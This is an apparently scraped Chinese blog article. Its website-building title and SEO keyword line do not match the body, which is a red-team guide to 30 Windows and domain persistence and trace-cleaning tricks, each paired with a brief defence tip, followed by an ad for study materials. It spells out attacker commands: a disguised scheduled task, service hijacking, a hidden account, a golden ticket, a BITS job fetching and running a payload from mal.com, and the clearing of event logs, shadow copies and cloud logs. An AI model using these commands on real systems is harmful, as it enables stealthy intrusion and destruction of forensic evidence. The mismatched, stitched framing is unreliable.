企业官网建设流程全解析

kindeditor wordpress,网站seo诊断报告例子,昆明做网站建设有哪些,淘宝客怎么建网站内网攻防#xff0c;玩的就是心跳。好不容易撕开一道口子#xff0c;横向渗透进去#xff0c;结果呢#xff1f;没几天就被蓝队发现了#xff0c;之前的努力全白费#xff01;权限维持和痕迹清理#xff0c;这才是决定你能否在内网“潜伏”下去的关键。别再傻乎乎地只知…内网攻防玩的就是心跳。好不容易撕开一道口子横向渗透进去结果呢没几天就被蓝队发现了之前的努力全白费权限维持和痕迹清理这才是决定你能否在内网“潜伏”下去的关键。别再傻乎乎地只知道删日志了今天就来扒一扒30种“阴招”看看你到底漏了哪一招以及如何防住这些“暗箭”。第一部分权限维持在内网“扎根”不被轻易踢出去的15个绝招“伪装者”计划任务谁说定时任务一定是好人黑客伎俩schtasks命令大家都知道。但高明的黑客会把定时任务伪装成系统服务比如起个名字叫“MicrosoftEdgeUpdate”让你以为是Edge浏览器的自动更新。一旦触发后门就启动了。命令示例schtasks /create /tn MicrosoftEdgeUpdate /tr C:malware.exe /sc hourly防御反制别光盯着那些奇奇怪怪的任务名重点监控计划任务里那些非微软签名的程序路径记住签名才是王道“鸠占鹊巢”服务注入把恶意代码塞进“正规军”里黑客伎俩Windows服务哪个不是“根正苗红”但黑客偏偏要搞事情劫持合法服务的二进制路径指向恶意DLL。比如把“Print Spooler”服务给“污染”了。命令示例sc config spooler binPath C:WindowsSystem32mal.dll防御反制启用服务签名验证启用服务签名验证启用服务签名验证重要的事情说三遍。这招能有效防止“李鬼”冒充“李逵”。“阴魂不散”注册表自启动开机启动项永远的“钉子户”黑客伎俩注册表Windows的“心脏”。黑客会修改HKCUSoftwareMicrosoftWindowsCurrentVersionRun或者HKLM下的对应项让恶意程序开机自启动。隐蔽手段用CLSID混淆键名比如{AB3D1234-...}让你眼花缭乱。防御反制部署注册表变更告警规则任何对启动项的修改都要第一时间知道“潜伏”启动文件夹把“定时炸弹”藏在你每天都要打开的地方黑客伎俩把恶意快捷方式.lnk扔进%AppData%MicrosoftWindowsStart MenuProgramsStartup让你每天开机都“惊喜”一下。障眼法用.url文件伪装成合法文档迷惑性更强。防御反制限制用户目录的写入权限别让用户随便往启动文件夹里扔东西“幕后黑手”WMI事件订阅无需交互自动触发的“定时器”黑客伎俩注册WMI事件过滤器比如设置成用户登录时触发后门。这意味着只要有人登录后门就自动运行根本不需要你手动点击脚本示例powershell $filterArgs { EventNamespacerootcimv2; QueryLanguageWQL; QuerySELECT * FROM __InstanceCreationEvent WITHIN 10 WHERE TargetInstance ISA Win32_LogonSession } $consumerArgs { NameMalConsumer; [ScriptingEngine]JScript; ScriptText... }防御反制定期审计__EventFilter/__EventConsumer类看看有没有人偷偷注册了恶意的WMI事件。“隐身人”影子账户在你的眼皮底下创建一个你永远看不到的账户黑客伎俩通过修改注册表添加一个隐藏账户。这个账户平时你看不到但黑客可以随时用它来搞事情。操作命令powershell reg add HKLMSAMSAMDomainsAccountUsers003E9 /v F /t REG_BINARY /d ...防御反制检查SAM中用户RID是否连续不连续就说明有问题“金钥匙”黄金票据有了它整个域都是你的黑客伎俩拿到域控的KRBTGT哈希就能伪造TGT票据也就是“黄金票据”。有了它就相当于拿到了整个域的“金钥匙”可以为所欲为生成命令powershell kerberos::golden /user:Administrator /domain:contoso.com /sid:S-1-5-21-... /krbtgt:hash /ptt防御反制定期重置KRBTGT密码每180天必须重置一次这是最有效的防御手段。“暗箱操作”ACL后门给关键进程开个“后门”想干啥就干啥黑客伎俩为关键进程比如LSASS.exe添加调试权限这样就可以随意操控这个进程窃取敏感信息。操作命令powershell Set-ProcessSecurityDescriptor-Name lsass -Right GenericAll -Allow防御反制监控敏感进程的ACL变更任何对关键进程权限的修改都要高度警惕“狸猫换太子”DLL劫持替换系统DLL让你的程序“变异”黑客伎俩替换系统目录比如C:WindowsSystem32中未签名的DLL或者利用DLL搜索顺序劫持应用程序的调用链。攻击优先级系统目录下的DLL更容易被劫持。防御反制启用DLL签名强制验证CIG功能只允许加载签名过的DLL“乾坤大挪移”RID劫持偷梁换柱把低权限用户变成“管理员”* **黑客伎俩**修改低权限用户的RID为500管理员RID这样就可以冒充管理员执行各种敏感操作。 * **操作方式**通过mimikatz调整注册表F字段。 * **防御反制**检查用户SID与RID的合法性看看有没有用户的RID是500但SID却不是管理员的。“借刀杀人”COM劫持控制COM组件间接控制你的应用程序* **黑客伎俩**注册恶意的COM组件劫持MMC或者Office的调用链。这样当你使用这些应用程序时恶意代码就会被执行。 * **注册表关键路径**HKCRCLSID{...}InprocServer32 * **防御反制**禁用未签名的COM组件加载只允许加载受信任的COM组件。“移花接木”Hook注入拦截API调用篡改网络通信* **黑客伎俩**注入WS2_32.dll的connect函数实现网络通信重定向。这样你以为是在和正常的服务器通信实际上数据已经被黑客截获或者篡改了。 * **常用工具**Detours库可以方便地实现函数劫持。 * **防御反制**启用驱动签名验证DSE确保加载的驱动都是经过签名的。“暗度陈仓”Bits Jobs利用BITS服务偷偷下载恶意文件* **黑客伎俩**利用后台智能传输服务BITS下载恶意负载。BITS服务通常用于Windows更新不容易引起注意。 * **操作命令** powershell bitsadmin /create backdoor bitsadmin /addfile backdoor http://mal.com/payload.exe C: empsvchost.exe bitsadmin /SetNotifyCmdLine backdoor C: empsvchost.exe NULL * **防御反制**审核BITS任务列表看看有没有可疑的任务在偷偷下载文件。“瞒天过海”域信任关系滥用跨域提权把“友军”变成“敌人”* **黑客伎俩**在跨域信任的场景中利用SID History属性提权。简单来说就是把一个域的管理员权限偷偷转移到另一个域的用户身上。 * **操作方式**使用mimikatz添加域控的SID至用户属性。 * **防御反制**禁用不必要的域信任关系不要随便建立域信任“温水煮青蛙”Office宏潜伏在Office文档里的“定时炸弹”* **黑客伎俩**在Normal.dotm模板中嵌入恶意宏代码。这样每次你启动Word时恶意宏就会自动执行。 * **触发条件**用户启动Word。 * **防御反制**启用宏执行限制只允许签名宏或者干脆禁用宏第二部分痕迹清理抹去一切不留痕迹的15个“障眼法”“一键清空”Windows事件日志眼不见为净但真的干净了吗操作工具wevtutil cl Security需要管理员权限。高级对抗使用内存注入技术直接操作eventlog.service进程绕过日志记录。防御反制启用日志转发至SIEM系统本地日志可以被清空但SIEM系统里的日志还在“釜底抽薪”IIS日志擦除选择性删除避免“一锅端”日志路径C:inetpublogsLogFilesW3SVC1。清理技巧只删除特定时间段的日志条目避免全量删除引发怀疑。防御反制配置日志文件ACL为只读防止被篡改“瞒天过海”防火墙规则恢复复用已有规则隐藏你的“小动作”操作方式删除新增的放行规则netsh advfirewall firewall delete rule namemal_rule。高级隐蔽复用已有规则名称比如Remote Desktop让你难以察觉。防御反制基线化防火墙规则并监控变更任何对防火墙规则的修改都要记录下来“时光倒流”文件时间戳伪造让你的恶意文件看起来像系统文件一样“古老”操作工具timestomp.exe -m 01/01/2020 08:00:00 malware.exe。伪造技巧将时间戳与系统文件比如notepad.exe保持一致。防御反制启用文件完整性监控FIM监控文件的任何修改“无影无踪”内存痕迹清除彻底擦除不留任何“蛛丝马迹”技术手段卸载恶意驱动后调用ExAllocatePool覆盖内存区域。高级工具使用BOFBeacon Object Files实现无文件擦除。防御反制部署内存扫描工具比如Elastic Endpoint定期扫描内存发现可疑代码。“不留后患”回收站绕过删除彻底删除不给恢复的机会操作命令del /f /q /s *.*配合shiftdelete彻底清除。增强手段使用cipher /w:C:覆写磁盘空闲空间防止数据恢复。防御反制审计敏感目录的文件删除操作记录谁删除了什么文件“清理门户”预读取文件清理删除预读取文件抹去程序运行的“痕迹”文件路径C:WindowsPrefetch中.pf文件。操作命令定期执行del /f /q C:WindowsPrefetch*.pf。防御反制禁用预读取功能但这可能会影响系统性能需要谨慎评估。“时光机失效”卷影副本删除删除卷影副本让数据恢复变得不可能操作命令vssadmin delete shadows /all /quiet。高级对抗在提权后优先删除卷影防止取证恢复。防御反制限制vssadmin执行权限不要让普通用户随意删除卷影副本。“抹去记忆”RDP连接记录清除删除RDP连接记录隐藏你的“登录足迹”注册表路径HKCUSoftwareMicrosoftTerminal Server ClientServers。自动化操作编写脚本批量删除历史IP记录。防御反制启用RDP连接日志审计记录谁在什么时间连接了RDP。“洗心革面”浏览器历史痕迹清理清理浏览器历史抹去你的“上网记录”* **操作工具**使用BrowsingHistoryView导出并删除Chrome/Firefox记录。 * **高级手段**劫持浏览器扩展自动清理历史比如恶意插件。 * **防御反制**监控浏览器进程的异常行为看看有没有插件在偷偷清理历史。“瞒天过海”PowerShell日志绕过隐藏执行窗口删除日志文件* **技术手段**通过-WindowStyle Hidden -ExecutionPolicy Bypass隐藏执行窗口。 * **日志清除**删除Microsoft-Windows-PowerShell%4Operational.evtx。 * **防御反制**启用模块日志记录ScriptBlockLogging记录PowerShell脚本的执行内容。“清理战场”WMI日志清理删除WMI日志抹去WMI操作的“痕迹”* **日志路径**Applications and Services LogsMicrosoftWindowsWMI-Activity。 * **清理难点**需要停止Winmgmt服务后才能操作日志文件。 * **防御反制**启用WMI活动审计策略记录WMI的活动。“掩耳盗铃”Linux utmp/wtmp清理删除登录记录伪装成“从未登录过”* **关键文件**/var/run/utmp、/var/log/wtmp。 * **操作工具**使用utmpdump工具编辑登录记录。 * **防御反制**配置ttylog实时记录会话内容“斩草除根”数据库日志截断删除数据库日志防止数据泄露* **MySQL**PURGE BINARY LOGS BEFORE 2024-01-01; * **MSSQL**执行EXEC sp_cycle_errorlog;循环日志文件。 * **防御反制**启用数据库审计并异地存储日志“移花接木”云平台日志覆盖删除云平台日志掩盖云上的“犯罪现场”* **AWS**通过DeleteLogGroup删除CloudTrail日志组。 * **Azure**使用Remove-AzLogProfile清除活动日志配置。 * **防御反制**启用云日志不可变性Immutable Storage防止日志被篡改或者删除。防御方血泪建议别再做“睁眼瞎”亡羊补牢为时未晚权限维持检测部署EDR监控进程树异常、注册表关键路径变更、服务签名异常痕迹清理对抗实施日志多副本存储本地云端物理设备使用AI分析日志完整性红队验证定期模拟攻击验证防御体系有效性重点关注上述30项技术的防护盲区看到这里你还敢掉以轻心吗内网攻防防守方永远是被动的。只有了解攻击者的手段才能更好地保护自己。别再做“睁眼瞎”了亡羊补牢为时未晚学习资源如果你是也准备转行学习网络安全黑客或者正在学习这里开源一份360智榜样学习中心独家出品《网络攻防知识库》,希望能够帮助到你知识库由360智榜样学习中心独家打造出品旨在帮助网络安全从业者或兴趣爱好者零基础快速入门提升实战能力熟练掌握基础攻防到深度对抗。1、知识库价值深度 本知识库超越常规工具手册深入剖析攻击技术的底层原理与高级防御策略并对业内挑战巨大的APT攻击链分析、隐蔽信道建立等提供了独到的技术视角和实战验证过的对抗方案。广度 面向企业安全建设的核心场景渗透测试、红蓝对抗、威胁狩猎、应急响应、安全运营本知识库覆盖了从攻击发起、路径突破、权限维持、横向移动到防御检测、响应处置、溯源反制的全生命周期关键节点是应对复杂攻防挑战的实用指南。实战性 知识库内容源于真实攻防对抗和大型演练实践通过详尽的攻击复现案例、防御配置实例、自动化脚本代码来传递核心思路与落地方法。2、 部分核心内容展示360智榜样学习中心独家《网络攻防知识库》采用由浅入深、攻防结合的讲述方式既夯实基础技能更深入高阶对抗技术。360智榜样学习中心独家《网络攻防知识库》采用由浅入深、攻防结合的讲述方式既夯实基础技能更深入高阶对抗技术。内容组织紧密结合攻防场景辅以大量真实环境复现案例、自动化工具脚本及配置解析。通过策略讲解、原理剖析、实战演示相结合是你学习过程中好帮手。1、网络安全意识2、Linux操作系统3、WEB架构基础与HTTP协议4、Web渗透测试5、渗透测试案例分享6、渗透测试实战技巧7、攻防对战实战8、CTF之MISC实战讲解3、适合学习的人群‌一、基础适配人群‌‌零基础转型者‌适合计算机零基础但愿意系统学习的人群资料覆盖从网络协议、操作系统到渗透测试的完整知识链‌‌开发/运维人员‌具备编程或运维基础者可通过资料快速掌握安全防护与漏洞修复技能实现职业方向拓展‌或者转行就业‌应届毕业生‌计算机相关专业学生可通过资料构建完整的网络安全知识体系缩短企业用人适应期‌‌二、能力提升适配‌1、‌技术爱好者‌适合对攻防技术有强烈兴趣希望掌握漏洞挖掘、渗透测试等实战技能的学习者‌2、安全从业者‌帮助初级安全工程师系统化提升Web安全、逆向工程等专项能力‌3、‌合规需求者‌包含等保规范、安全策略制定等内容适合需要应对合规审计的企业人员‌因篇幅有限仅展示部分资料完整版的网络安全学习资料已经上传CSDN朋友们如果需要可以在下方CSDN官方认证二维码免费领取【保证100%免费】